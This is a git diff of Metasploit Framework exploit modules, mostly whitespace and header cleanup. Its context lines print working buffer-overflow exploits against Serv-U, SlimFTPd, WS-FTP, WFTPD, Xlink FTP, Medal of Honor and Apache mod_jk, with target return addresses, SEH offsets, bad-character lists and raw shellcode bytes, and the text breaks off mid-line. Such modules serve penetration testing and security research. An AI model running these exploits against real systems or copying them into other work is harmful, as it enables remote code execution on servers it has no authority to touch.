[ 'URL', 'http://www.cnhonker.com/advisory/serv-u.mdtm.txt'], [ 'URL', 'http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54'], [ 'BID', '9751'], - ], 'Privileged' => false, 'Payload' => @@ -55,43 +51,42 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 1000, 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ - [ + [ 'Serv-U Uber-Leet Universal ServUDaemon.exe', # Tested OK - hdm 11/25/2005 { 'Platform' => 'win', 'Ret' => 0x00401877, }, ], - [ + [ 'Serv-U 4.0.0.4/4.1.0.0/4.1.0.3 ServUDaemon.exe', { 'Platform' => 'win', 'Ret' => 0x0040164d, }, ], - [ + [ 'Serv-U 5.0.0.0 ServUDaemon.exe', { 'Platform' => 'win', 'Ret' => 0x0040167e, }, - ], + ], ], 'DisclosureDate' => 'Feb 26 2004', 'DefaultTarget' => 0)) - + register_advanced_options( - [ - OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), - OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), - ], self.class) - + [ + OptInt.new('SEHOffset', [ false, "Offset from beginning of timezone to SEH", 47 ]), + OptInt.new('ForceDoubling', [ false, "1 to force \\xff doubling for 4.0.0.4, 0 to disable it, 2 to autodetect", 2 ]), + ], self.class) + end - + # From 5.0.0.4 Change Log # "* Fixed bug in MDTM command that potentially caused the daemon to crash." # @@ -101,20 +96,20 @@ class Metasploit3 < Msf::Exploit::Remote # 220 ProFTPD 1.2.5rc1 Server (ftp2.rhinosoft.com) [62.116.5.74] # # Heh :) - + def check connect - disconnect - + disconnect + case banner when /Serv-U FTP Server v4\.1/ print_status('Found version 4.1.0.3, exploitable') return Exploit::CheckCode::Vulnerable - + when /Serv-U FTP Server v5\.0/ print_status('Found version 5.0.0.0 (exploitable) or 5.0.0.4 (not), try it!'); return Exploit::CheckCode::Appears - + when /Serv-U FTP Server v4\.0/ print_status('Found version 4.0.0.4 or 4.1.0.0, additional check.'); send_user(datastore['USER']) @@ -126,11 +121,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status('Found version 4.1.0.0, exploitable'); return Exploit::CheckCode::Vulnerable end - + when /Serv-U FTP Server/ print_status('Found an unknown version, try it!'); return Exploit::CheckCode::Detected - + else print_status('We could not recognize the server banner') return Exploit::CheckCode::Safe @@ -138,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - + def exploit - + # generate_egghunter connect_login - + print_status("Trying target #{target.name}...") # Should have paid more attention to skylined's exploit, only after figuring # out how my payloads were getting transformed did I remember seeing \xff # doubling in his CHMOD exploit, arg! shellcode = payload.encoded - + case datastore['ForceDoubling'] when 1 print_status("Forced doubling of all \\xff sequences in the encoded payload") @@ -177,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote end jump_back = Rex::Arch::X86.jmp_short('$+' + (-1 * search_code.length).to_s) + 'BB' - + buf = 'MDTM 20031111111111+' + ('A' * (datastore['SEHOffset'] - search_code.length)) buf << search_code buf << jump_back @@ -188,14 +183,14 @@ class Metasploit3 < Msf::Exploit::Remote buf << search_rtag send_cmd( [buf], false ) - + handler disconnect end - + def double_ff? res = send_cmd( ['P@SW'], true ) return (res and res =~ /^500/) ? true : false - end + end end diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index b1573dda77..3396954a0b 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SlimFTPd LIST Concatenation Overflow', 'Description' => %q{ - This module exploits a stack overflow in the SlimFTPd + This module exploits a stack overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo. - }, 'Author' => [ 'Fairuzan Roslan ' ], 'License' => BSD_LICENSE, @@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-2373'], [ 'OSVDB', '18172'], [ 'BID', '14339'], - ], 'Privileged' => false, 'Payload' => @@ -45,9 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 490, 'BadChars' => "\x00\x0a\x0d\x20\x5c\x2f", 'StackAdjustment' => -3500, - }, - 'Targets' => + 'Targets' => [ [ 'SlimFTPd Server <= 3.16 Universal', @@ -60,10 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Jul 21 2005', 'DefaultTarget' => 0)) end - + def exploit connect_login - + print_status("Trying target #{target.name}...") buf = make_nops(511) @@ -73,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote send_cmd( ['XMKD', '41414141'], true ); send_cmd( ['CWD', '41414141'], true ); send_cmd( ['LIST', buf], false ) - + handler disconnect end diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index fcc2d142c0..28b7b94859 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered + This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message. }, 'Author' => diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index ebcd3f8e38..6e2a52d497 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - # Use a copy of the target + # Use a copy of the target mytarget = target if (target['auto']) diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 5e954b5d67..28c06bc2cb 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'War-FTPD 1.65 Password Overflow', 'Description' => %q{ - This exploits the buffer overflow found in the PASS command + This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to @@ -32,14 +30,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'hdm', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '1999-0256'], [ 'OSVDB', '875' ], [ 'BID', '10078' ], [ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ], ], - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process' }, @@ -64,7 +62,6 @@ class Metasploit3 < Msf::Exploit::Remote }, ], ])) - end def exploit diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index a43fa5bd04..7174f286b6 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,20 +20,20 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'War-FTPD 1.65 Username Overflow', 'Description' => %q{ - This module exploits a buffer overflow found in the USER command + This module exploits a buffer overflow found in the USER command of War-FTPD 1.65. }, 'Author' => 'Fairuzan Roslan ', 'License' => BSD_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '1999-0256'], [ 'OSVDB', '875' ], [ 'BID', '10078' ], [ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ], ], - 'DefaultOptions' => + 'DefaultOptions' => { 'EXITFUNC' => 'process' }, @@ -79,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Ret' => 0x71ab2b53 # push esp, ret } - ] + ] ])) end diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index c08b7df86c..ce2f25ace2 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Texas Imperial Software WFTPD 3.23 SIZE Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the SIZE verb in + This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23. }, 'Author' => 'MC', @@ -43,10 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 500, 'BadChars' => "\x00\x20\x0a\x0d", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2d3028 } ], [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dd1595 } ], @@ -59,8 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_login - sploit = "/" + make_nops(525 - payload.encoded.length) - sploit << payload.encoded + [target.ret].pack('V') + sploit = "/" + make_nops(525 - payload.encoded.length) + sploit << payload.encoded + [target.ret].pack('V') print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 2e87d827a7..757e7c885c 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'WS-FTP Server 5.03 MKD Overflow', 'Description' => %q{ This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin. - }, 'Author' => [ 'et', 'Reed Arvin ' ], 'License' => BSD_LICENSE, @@ -35,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2004-1135' ], [ 'OSVDB', '12509' ], [ 'BID', '11772'], - ], 'Privileged' => false, 'Payload' => @@ -44,16 +40,16 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'WS-FTP Server 5.03 Universal', { 'Platform' => 'win', 'Ret' => 0x25185bb8, # Address is executable to allow XP and 2K # 0x25185bb8 = push esp, ret (libeay32.dll) - # B85B1825XX = mov eax,0xXX25185b + # B85B1825XX = mov eax,0xXX25185b }, ], ], @@ -63,28 +59,28 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /5\.0\.3/) return Exploit::CheckCode::Vulnerable - end + end return Exploit::CheckCode::Safe end - + def exploit connect_login - + print_status("Trying target #{target.name}...") - + buf = rand_text_alphanumeric(8192) - buf[498, 4] = [ 0x7ffd3001 ].pack('V') + buf[498, 4] = [ 0x7ffd3001 ].pack('V') buf[514, 4] = [ target.ret ].pack('V') buf[518, 4] = [ target.ret ].pack('V') buf[522, 2] = make_nops(2) buf[524, payload.encoded.length] = payload.encoded - + send_cmd( ['MKD', buf], true ); - handler + handler disconnect end diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index eba127ba4e..5933ab1e01 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Ipswitch WS_FTP Server 5.05 XMD5 Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the XMD5 verb in + This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05. }, 'Author' => 'MC', @@ -42,8 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - - 'Targets' => + 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec663 } ], [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 } ], @@ -56,20 +53,20 @@ class Metasploit3 < Msf::Exploit::Remote def check connect - disconnect + disconnect if (banner =~ /WS_FTP Server 5.0.5/) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect_login print_status("Trying target #{target.name}...") - sploit = rand_text_alphanumeric(676, payload_badchars) - sploit << [target.ret].pack('V') + payload.encoded + sploit = rand_text_alphanumeric(676, payload_badchars) + sploit << [target.ret].pack('V') + payload.encoded send_cmd( ['XMD5', sploit] , false) diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index 064e18bbe3..c5e90d9685 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit', 'Description' => %q{ - This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered + This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message. }, 'Author' => diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 90e3df0f8e..efecb57783 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -15,15 +19,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Xlink FTP Client Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink FTP Client 32 - Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, - arbitrary code may be executed. + Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. + When a overly long FTP server response is recieved by a client, + arbitrary code may be executed. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-5792' ], [ 'OSVDB', '33969' ], [ 'URL', 'http://www.metasploit.com/' ], @@ -44,21 +48,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows XP Pro SP3 English', { 'Ret' => 0x7d054897 } ], - [ 'Windows 2000 SP4 English', { 'Ret' => 0x7ce02a2d } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x7ce02a2d } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 3 2009', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The FTP daemon port to listen on", 21 ]), ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) sploit = rand_text_alpha_upper(260) + [target.ret].pack('V') + payload.encoded sploit << rand_text_alpha_upper(1024 - payload.encoded.length) + "\r\n" diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index d202135818..7eedd531b5 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -13,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Xlink FTP Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink FTP Server - that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP request is sent to the server, - arbitrary code may be executed. + that comes bundled with Omni-NFS Enterprise 5.2. + When a overly long FTP request is sent to the server, + arbitrary code may be executed. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -45,13 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', 'Targets' => - [ - [ 'Omni-NFS Enterprise V5.2', { 'Ret' => 0x1001f09c } ], # OmniEOM.DLL 1.0.0.1 - ], + [ + [ 'Omni-NFS Enterprise V5.2', { 'Ret' => 0x1001f09c } ], # OmniEOM.DLL 1.0.0.1 + ], 'DisclosureDate' => 'Oct 3 2009', 'DefaultTarget' => 0)) - deregister_options('FTPUSER', 'FTPPASS') + deregister_options('FTPUSER', 'FTPPASS') end def check @@ -61,19 +65,19 @@ class Metasploit3 < Msf::Exploit::Remote if (banner =~ /XLINK FTP Server/) return Exploit::CheckCode::Vulnerable end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end - + def exploit connect sploit = payload.encoded + [target.ret].pack('V') sploit << rand_text_alpha_upper(2024 - payload.encoded.length) + "\r\n" - + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 68afea0315..a30246dece 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Medal Of Honor Allied Assault getinfo Stack Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in the getinfo - command of Medal Of Honor Allied Assault. + This module exploits a stack based buffer overflow in the getinfo + command of Medal Of Honor Allied Assault. }, 'Author' => [ 'Jacopo Cervini' ], 'License' => BSD_LICENSE, @@ -42,17 +40,17 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx ], 'DisclosureDate' => 'Jul 17 2004', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(12203) - ], self.class) + register_options( + [ + Opt::RPORT(12203) + ], self.class) end def exploit @@ -79,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote buf << "\x32\x44\x24\x24" # XOR AL,BYTE PTR SS:[ESP+24] buf << "\x49\x49" # DEC ECX buf << "\x31\x48\x34" # XOR DWORD PTR DS:[EAX+34],ECX - buf << "\x58"*11 # POP EAX + buf << "\x58"*11 # POP EAX buf << "\x42"*66 buf << "\x3c"*4 buf << "\x42"*48 @@ -88,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote req = "\xff\xff\xff\xff\x02" + "getinfo " + buf req << "\r\n\r\n" + make_nops(32) + payload.encoded - udp_sock.put(req) + udp_sock.put(req) handler disconnect_udp diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 8b8aa3b9a3..37e5469957 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Racer v0.5.3 beta 5 Buffer Overflow', 'Description' => %q{ - This module explots the Racer Car and Racing Simulator game + This module explots the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely. @@ -44,21 +42,20 @@ class Metasploit3 < Msf::Exploit::Remote 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Tested ok patrickw 20090503 [ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp [ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ], [ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], - ], 'DisclosureDate' => 'Aug 10 2008', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(26000) - ], self.class) + register_options( + [ + Opt::RPORT(26000) + ], self.class) end def exploit diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index dabfcddcaf..52b2e9d44c 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -11,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - + def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute.', 'Description' => %q{ This module exploits a authentication bypass vulnerability which - allows remote attackers to upload and execute arbitrary code. + allows remote attackers to upload and execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -31,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-066' ], ], 'Targets' => - [ - [ 'Universal Windows Target', + [ + [ 'Universal Windows Target', { 'Arch' => ARCH_JAVA, 'Payload' => @@ -74,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'UID' => uid, } }, 5) - + if ( res and res.message =~ /OK/ ) id = res['sessionid'].to_s.strip diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index e49400dd3f..adfaad14e4 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Alt-N SecurityGateway username Buffer Overflow', 'Description' => %q{ - Alt-N SecurityGateway is prone to a buffer overflow condition. This + Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'), 'StackAdjustment' => -3500, 'EncoderType' => Msf::Encoder::Type::SingleStaticBit, - 'EncoderOptions' => + 'EncoderOptions' => { 'BitNumber' => 0x5, 'BitValue' => true, @@ -66,7 +66,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 02 2008')) - register_options([Opt::RPORT(4000)], self.class) + register_options( + [ + Opt::RPORT(4000) + ], self.class) end diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 9f3067b756..536b987a45 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -304,7 +304,7 @@ class Metasploit3 < Msf::Exploit::Remote # _______________ _______________ ___________ # _________ _____________ | ________ | | ______ | | ______ # v | v | v v | | v v | | v v | - # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret] + # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret] # print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]") diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index e76cb2a1a3..c353ba3875 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -8,10 +18,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Apache mod_jk 1.2.20 Buffer Overflow', 'Description' => %q{ - This is a stack overflow exploit for mod_jk 1.2.20. + This is a stack overflow exploit for mod_jk 1.2.20. Should work on any Win32 OS. }, 'Author' => 'Nicob ', @@ -38,14 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote 'MaxNops' => 0, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3) ['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }], ], 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def check @@ -54,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("GET / HTTP/1.0\r\n\r\n") resp = sock.get_once disconnect - + if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then print_status("Apache version detected : #{m[1]}") return Exploit::CheckCode::Appears @@ -77,20 +87,20 @@ class Metasploit3 < Msf::Exploit::Remote # 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20 # 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20 # 4423 : Apache/2.2.3 (Win32) mod_jk/1.2.20 - + [ 4343, 4407, 4423 ].each { |seh_offset| sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V') sploit[seh_offset - 4, 